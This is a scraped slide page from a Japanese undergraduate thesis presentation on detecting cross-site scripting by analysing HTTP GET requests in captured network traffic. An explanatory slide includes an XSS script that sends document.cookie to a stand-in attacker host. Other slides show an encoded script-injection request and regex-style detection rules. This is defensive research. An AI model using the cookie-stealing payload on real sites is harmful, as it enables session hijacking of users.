Download
1 / 22
220 likes | 333 Views
卒業論文発表 「 Web アクセスに伴う脅威の特徴分析」. 後藤研究室 1G05R191-9 米山 諒. 研究背景. インターネットの普及に伴い,クロスサイトスクリプティング (XSS), Phishing, SQL-Injection など Web 上の脆弱性が問題視されている。. 脆弱性を持つサイトが数多く存在する。 未対応のまま放置されているものもある。. Web サーバ側の対応だけでは十分ではない。. 研究目的. 増加傾向にある Web 上の脆弱性による脅威を防ぐために, Web サーバの外で対策を行う。
E N D
卒業論文発表「Web アクセスに伴う脅威の特徴分析」 後藤研究室 1G05R191-9 米山 諒 卒業論文発表
研究背景 • インターネットの普及に伴い,クロスサイトスクリプティング (XSS), Phishing, SQL-Injection など Web 上の脆弱性が問題視されている。 • 脆弱性を持つサイトが数多く存在する。 • 未対応のまま放置されているものもある。 • Web サーバ側の対応だけでは十分ではない。 卒業論文発表
研究目的 • 増加傾向にある Web 上の脆弱性による脅威を防ぐために,Web サーバの外で対策を行う。 • クライアント側の対策では,ユーザの操作や設定によって機能を無効化してしまう恐れがある。 • サーバとクライアントの中継地点での対策を提案する。 卒業論文発表
クロスサイトスクリプティング (XSS) 悪意のあるスクリプトを含んだ URI http://victim.com/foo.cgi?q= <html_javascript_exploit_code> <HTML> <BODY> <B>Web Page Content</B> The JavaScript code within the URL is echoed by the website and executed in the users browser. click 10.19.19.1 – “GET / HTTP/1.1” 200 81 10.19.19.1 – “GET / HTTP/1.1” 200 81 10.19.19.1 – “GET / HTTP/1.1” 200 81 10.19.19.1 – “GET / HTTP/1.1” 200 81 10.19.19.1 – “GET / HTTP/1.1” 200 81 10.19.19.1 – “GET / HTTP/1.1” 200 81 10.19.19.1 – “GET / HTTP/1.1” 200 81 10.19.19.1 – “GET / HTTP/1.1” 200 81 10.19.19.1 – “GET /cookie_data HTTP/1.1” 200 335 10.19.19.1 – “GET / HTTP/1.1” 200 81 10.19.19.1 – “GET / HTTP/1.1” 200 81 10.19.19.1 – “GET / HTTP/1.1” 200 81 10.19.19.1 – “GET / HTTP/1.1” 200 81 10.19.19.1 – “GET / HTTP/1.1” 200 81 10.19.19.1 – “GET / HTTP/1.1” 200 81 <SCRIPT> var img = new Image(); Img.src = ‘http://hacker.com/’ +document.cookie; </SCRIPT> </BODY> </HTML> 卒業論文発表
被害の一例 • Cookie を盗まれてセッションハイジャックされる。 • 意図しない Web サイトの機能を実行される。 • ページの任意の部分を変更される。 • DoS 攻撃に利用される。 • Phishing (フィッシング詐欺) に利用される。 • マルウェアをダウンロードさせられる。 卒業論文発表
提案手法 • ネットワーク上を流れるトラフィックデータを利用して,クロスサイトスクリプティング (XSS) の検知を行う。 • tcpdump のデータから HTTP ヘッダを抽出する。 • HTTP ヘッダから GET メソッドを抽出する。 • GET メソッドで渡される引数を解析して検知する。 卒業論文発表
提案手法の概要 HTTPリクエスト (スクリプトの抽入) HTTPリクエスト 攻撃者 レスポンス HTTPリクエスト Webサーバ GET /xss.cgi? form=%3Cscript%3Ealert(XSS)%3C%2Fscript%3E Host: www.exsample.com Accept: text/html; Accept-Language: ja, en-us; Accept-Encoding: gzip,defate Accept-Charset: Shift_JIS,utf-8; Cookie: SSID=123abc 一般ユーザ 卒業論文発表
評価実験 • サンプルデータによる提案手法の検知精度 • XSSed – XSS (Cross-Site Scripting) information and vulnerable websites archive • http://www.xssed.com/ • XSS Workshop • http://blogged-on.de/xss/ • XSS Challenges • http://xss-quiz.int21h.jp/ • 実際のトラフィックデータへ提案手法の適用 • 早稲田大学のトラフィックデータを利用する。 卒業論文発表
検知ルール • 提案手法Aの検知ルール • <script> タグ • javascript: によるスクリプト • onClick イベント • onMouseOver イベント • 検知手法Bの検知ルール • <script> タグ • javascript: によるスクリプト • イベントハンドラ (正規表現によるマッチング) 卒業論文発表
トラフィックの測定環境 Internet Router Waseda Network Router Capturing Machine 卒業論文発表
実験結果 (サンプルデータ) • パケット数は HTTP パケットの総数 • GET メソッドには画像ファイルなどの呼び出しを含む 卒業論文発表
検知精度 (サンプルデータ) • <script> タグ • エンコードで隠ぺいしたスクリプトの検知が可能であった。 • Javascript: によるスクリプト • 確実に検知できることを確認できた。 • イベントハンドラ • 属性値が「’」もしくは「”」で囲まれているものを検知できた。 卒業論文発表
実験結果 (早稲田トラフィックデータ) 卒業論文発表
結論 まとめ • サーバとクライアントの中継地点の対策を提案した。 • HTTP ヘッダ中の GET メソッドの特徴を利用することで,クロスサイトスクリプティング (XSS) の検知が可能であることを示した。 今後の課題 • 検知の精度 (見逃しと誤検知) • リアルタイムでの検知 卒業論文発表
ご清聴ありがとうございました 卒業論文発表
既存手法 • Snort • TCP, UDP, ICMP, IP の解析を行うことができる。 • 上記以外のプロトコルについては記録のみを行う。 • Proxy サーバ • Proxy サーバを利用して,HTTP プロトコルを解析する。 • HTML 文章まで解析することで検知を行うことができる。 卒業論文発表
HTTP/1.1 メソッド 卒業論文発表
リクエストメッセージの例 卒業論文発表
レスポンスメッセージの例 卒業論文発表
JavaScript のイベントハンドラ 卒業論文発表
エンコードと実体参照 卒業論文発表
サンプルデータの収集 HTTP リクエスト Internet レスポンス Client PC Web Server 卒業論文発表
